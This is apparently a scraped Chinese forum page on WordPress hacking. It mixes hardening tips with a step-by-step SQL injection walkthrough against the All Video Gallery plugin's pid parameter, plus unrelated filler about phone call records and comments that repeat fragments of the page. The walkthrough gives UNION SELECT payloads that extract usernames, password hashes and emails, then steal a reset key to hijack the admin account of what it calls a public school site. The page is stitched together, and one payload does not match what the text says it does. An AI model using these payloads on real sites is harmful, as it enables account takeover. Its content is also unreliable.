WPE论坛,WP黑客

hacker2年前网络黑客210

wp8被黑客黑了吗

自己的PC机器吗?如果是的话最多就中点病毒,或者成肉鸡,黑客攻击对象是有价值的机器,普通PC机的话杀杀毒,关了可疑进程就好

如何提高Wordpress的安全性

为了不让你的博客哪天被人挂了个木马链接,适当的防范工作还是要做的。这里,我列举了几个常用的防范措施。 隐藏Wordpress的版本号 虽然Wordpress本身的安全性已经很好了,但多少还是会有些Bug(不然就不会有那么多的补丁发布了),一不小心就可能会被黑客利用。除了经常更新Wordpress之外,最好还是将Wordpress的版本号隐藏掉。 很多Wordpress主题,包括Wordpress默认的主题,都会把Wordpress的版本号加在网站的头部。在模板文件夹的header.php文件里你经常会看到这样一句话: meta name="genrator" content="WordPress php bloginfo('version'); ? / 这样就直接泄露了你的Wordpress版本号,于是可能导致在你没有来的及更新Wordpress时,被黑客利用旧版本中的Bug攻击你的博客。 禁止用户浏览目录 有些主机默认会允许用户访问目录列表,你可以尝试在浏览器中访问“/wp-includes”目录,看文件是否有被列出来。 Options All -Indexes 更多关于.htaccess的使用技巧可以参考我的另一篇文章: 《Wordpress中.htaccess的使用技巧》。 另外在Wordpress中,有很多不必要的路径是不需要被搜索引擎抓取到的。比方以wp-开头的管理面板。这个你可以在.htaccess中修改(方法见上面给出的那篇文章),也可以完全不管。因为如今的搜索已经足够只能,可以分析出网站所用的框架,并自动过滤掉那边不必要的文件了。 修改admin管理员名 Wordpress默认会用admin做为管理员的名称。这样使得黑客可以暴力破解你的网站。所以你可以把管理员改为自己的用户名。Wordpress 3.0以上的版本已经原生支持修改管理员的功能了。另外,一个好的密码也是很重要的,最好的密码是大小写混杂数字,并毫无意义,当然,前提是你也要记得住才行哦~ 其实,我更建议你在管理员之外,再创建一个用户,只赋予编辑权限,专门用来发布、修改文章。只有在必要的时候(比方添加删除插件),再登陆管理员账号。 文件夹权限登陆Wordpress后台后,Wordpress经常会提醒你,你的XXX目录权限过低。很多时候,这条警告都会被用户忽略掉,但其实文件的权限设置非常重要,过低的权限可以会导致黑客以一个其它用户登陆系统,修改你的wordpress文件。 对于文件夹,一般755的权限就足够了。 修改表的前缀 Wordpress默认会经wp_做为数据库中表的前缀,笔者建议把它修改成一个随即的值。这个在你安装的时候可以选择。对于已经安装好的博客,如果你不想手动修改表和配置文件,可以用插件来帮你完成这项工作:Change DB Prefix。 利用插件提高安全性 Exploit Scanner: 扫描网站的中恶意代码。 WordFence Security或WordPress Sentinel: 检测Wordpress原文件是否被修改。 VIP Scanner:检测被插入到你模板中的广告信息。 最后,希望每个Wordpress站长都能拥有一个安全的博客。引用朋友的一句话做结束语:做站长,开心最重要。^_^

如何利用SQL注入漏洞攻破一个WordPress网站

SQL注入的基本原理

sql注入成因主要是对页面参数没有进行非法字符校验导致,比如说一个订单页面要显示某个客户的所有订单列表,这个页面的地址可能是,我们推理,这样页面的后台处理的sql应该是这样的:

select * form custom_order where custom_id = {$_GET['customID']}

按正常情况下,这里的接收的参数{$_GET['customID']}的值应该是传入的值3,这样页面就能正确的把所有客户ID等于3的订单信息显示到页面上。但是,如果这个参数被人恶意改成了如下形式:

union select 1,2,3,user,5,passwd,7,8,9,10 from admin

按这样的参数拼装成的sql就成了这样:

select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

这样注入恶意sql后,订单列表页显示的就不是订单信息了,而是数据库中用户的名称和密码,或者任意其它想要的信息。下面我们就按照这个原理来一步一步的获取这个公立学校网站的管理员用户名,管理员邮箱地址,通过邮箱重置管理员密码,登录超级管理员后台。

All Video Gallery插件的漏洞简介

安装了All Video Gallery插件的Wordpress博客里会有这样的一个地址:

;pid=11

访问这个页面会显示一些配置信息,问题就出在pid这个参数上,程序后台显然没有严格检查这个参数,我们将利用这个参数进行sql注入。

WordPress是一个开源的平台,我们很容易弄清楚用户表的表名是wp_users,存放用户名,密码,邮件地址的字段分别是user_login,user_pass,user_email,我们下面将要把用户信息表注入进去。

获取超级管理员用户名

为了获取用户表中的用户名,我们注入的sql是这样的:

;pid=1pid=-1

union select

1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41

from wp_users

在浏览器里输入上面的地址,页面上会显示下面的信息:

获取超级管理员邮件地址

我们可以直接获取用户的密码,但很显然,密码都是加密的,无法使用,我们这里使用另外一种思路,先获取用户的邮件地址,然后使用这个邮件重置用户的密码。

要获取邮件地址,我们需要将上面的sql中的字段名改成user_email:

;pid=1pid=-1

union select

1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41

from wp_users

在浏览器里输入上面的地址,页面上会显示下面的信息:

重置管理员密码

WordPress的后台登陆地址是,这个地址是可以公共访问的,我们进入这个页面后,点击Lost your password?链接,输入上面获取的管理员邮件。

这样做了之后,Wordpress会向这个邮件地址发送一封含有激活码的密码重置地址。我们无法登陆这个邮箱获取这个地址,但我们可以使用上面同样

的方法获取这个激活码,自己拼装出密码重置地址。存放激活码的字段是user_activation_key,我们的sql注入地址改成下面这样:

;pid=1pid=-1

union select

1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41

from wp_users

在浏览器里输入上面的地址,页面上会显示下面的信息:

有了激活码,我们就可以拼装出装置密码的地址了:

;key=resetkeylogin=username

利用这个地址进入重置密码页面:

总结

我们的黑客行动到此基本上是大功告成,但事实上我并没有去执行最后一步。本文的目的不是要告诉人们如何进行黑客攻击,而是要提醒大家防范安全漏洞,

所谓知己知彼,方能百战不殆,程序员应当对基本的黑客攻击方式有一些了解,针对性的在编程时避免造成类似sql注入的安全漏洞,构筑更健壮的软件。

标签: WP黑客

相关文章

通话内容记录能查到多久前的,查询很久前的通话记录

通话内容记录能查到多久前的,查询很久前的通话记录

苹果手机怎么查出来以前的通话记录? 用户可以在手机的通话记录中进行查询的,如果手机上的记录被清除,用户可以通过营业厅,运营商的网上营业厅等渠道查询通话记录的,以电信为例,通过电信网上营业厅查询电信的通...

安卓手机通话记录如何导出成表格,安卓手机通话记录如何导出

安卓手机通话记录如何导出成表格,安卓手机通话记录如何导出

安卓手机通话记录怎么导入到苹果手机 具体如下:1. 首先,我们打开安卓手机中的联系人,如图。2. 在之后在通讯录界面点击右上角的“三个点”图标,之后点击【导入/导出】,如图。3.然后点击【分享联系人】...

中国移动如何清理通话记录,移动怎么清楚通话记录

中国移动如何清理通话记录,移动怎么清楚通话记录

移动通话记录可以彻底删除吗/移动通话记录可以彻底 通话记录分两种情况,一种是手机上的通话记录,一种是运营商详单中的通话记录;1、如果是手机中的通话记录,不论是否接通,均会在手机上产生一条记录,此记录可...

荣耀手机通话记录保存多久,手机通话记录保存多久

荣耀手机通话记录保存多久,手机通话记录保存多久

苹果手机电话记录能保存多久? 1、苹果手机通话记录最长保留1年。根据苹果公司的官方说明,苹果手机的通话记录默认会在设备上保留最近100条通话记录。如果使用iCloud备份功能,则通话记录也会被备份。2...

手机微信视频通话记录怎么查,手机微信不能视频通话记录

手机微信视频通话记录怎么查,手机微信不能视频通话记录

微信不能视频通话原因? 1、手机的网络连接存在问题。无网络状态下是不能够进行视频聊天的。如果网络连接出现问题就该把网络关掉进行重连。2、微信的部分权限未被授权。核实是否使用安全软件限制微信软件使用摄像...

移动公司打通话记录必须本人吗,移动给开通话记录吗

移动公司打通话记录必须本人吗,移动给开通话记录吗

移动公司可以查到通话记录和内容吗? 可以到中国移动网上营业厅自助查询,具体方法如下:一、使用百度搜索,搜索”中国移动网上营业厅“,搜索后找到中国移动网上营业厅官网并点击进入。二、进入后,找到”查询服务...

评论列表

访客
2022-10-23 19:52:42

1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33

访客
2022-10-23 15:16:12

常用的防范措施。隐藏Wordpress的版本号虽然Wordpress本身的安全性已经很好了,但多少还是会有些Bug(不然就不会有那么多的补丁发布了),一不小心就可能会被黑客利用。除了经常更新Wordpress之外,最好还是将Wordpress的版本号隐藏掉。

访客
2022-10-23 14:34:44

致黑客以一个其它用户登陆系统,修改你的wordpress文件。对于文件夹,一般755的权限就足够了。修改表的前缀Wordpress默认会经wp_做为数据库中表的前缀,笔者建议把它修改成一个随即的值。这个在你安装的时候可以选择。对于已经安装好的博客,如果你不想手动修改表和

访客
2022-10-23 17:23:38

D等于3的订单信息显示到页面上。但是,如果这个参数被人恶意改成了如下形式: union select 1,2,3,user,5,passwd,7,8,9,10 from admin按这样的参数拼装成的sql就成

访客
2022-10-24 00:50:18

了。修改表的前缀Wordpress默认会经wp_做为数据库中表的前缀,笔者建议把它修改成一个随即的值。这个在你安装的时候可以选择。对于已经安装好的博客,如果你不想手动修改表和配置文件,可以

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。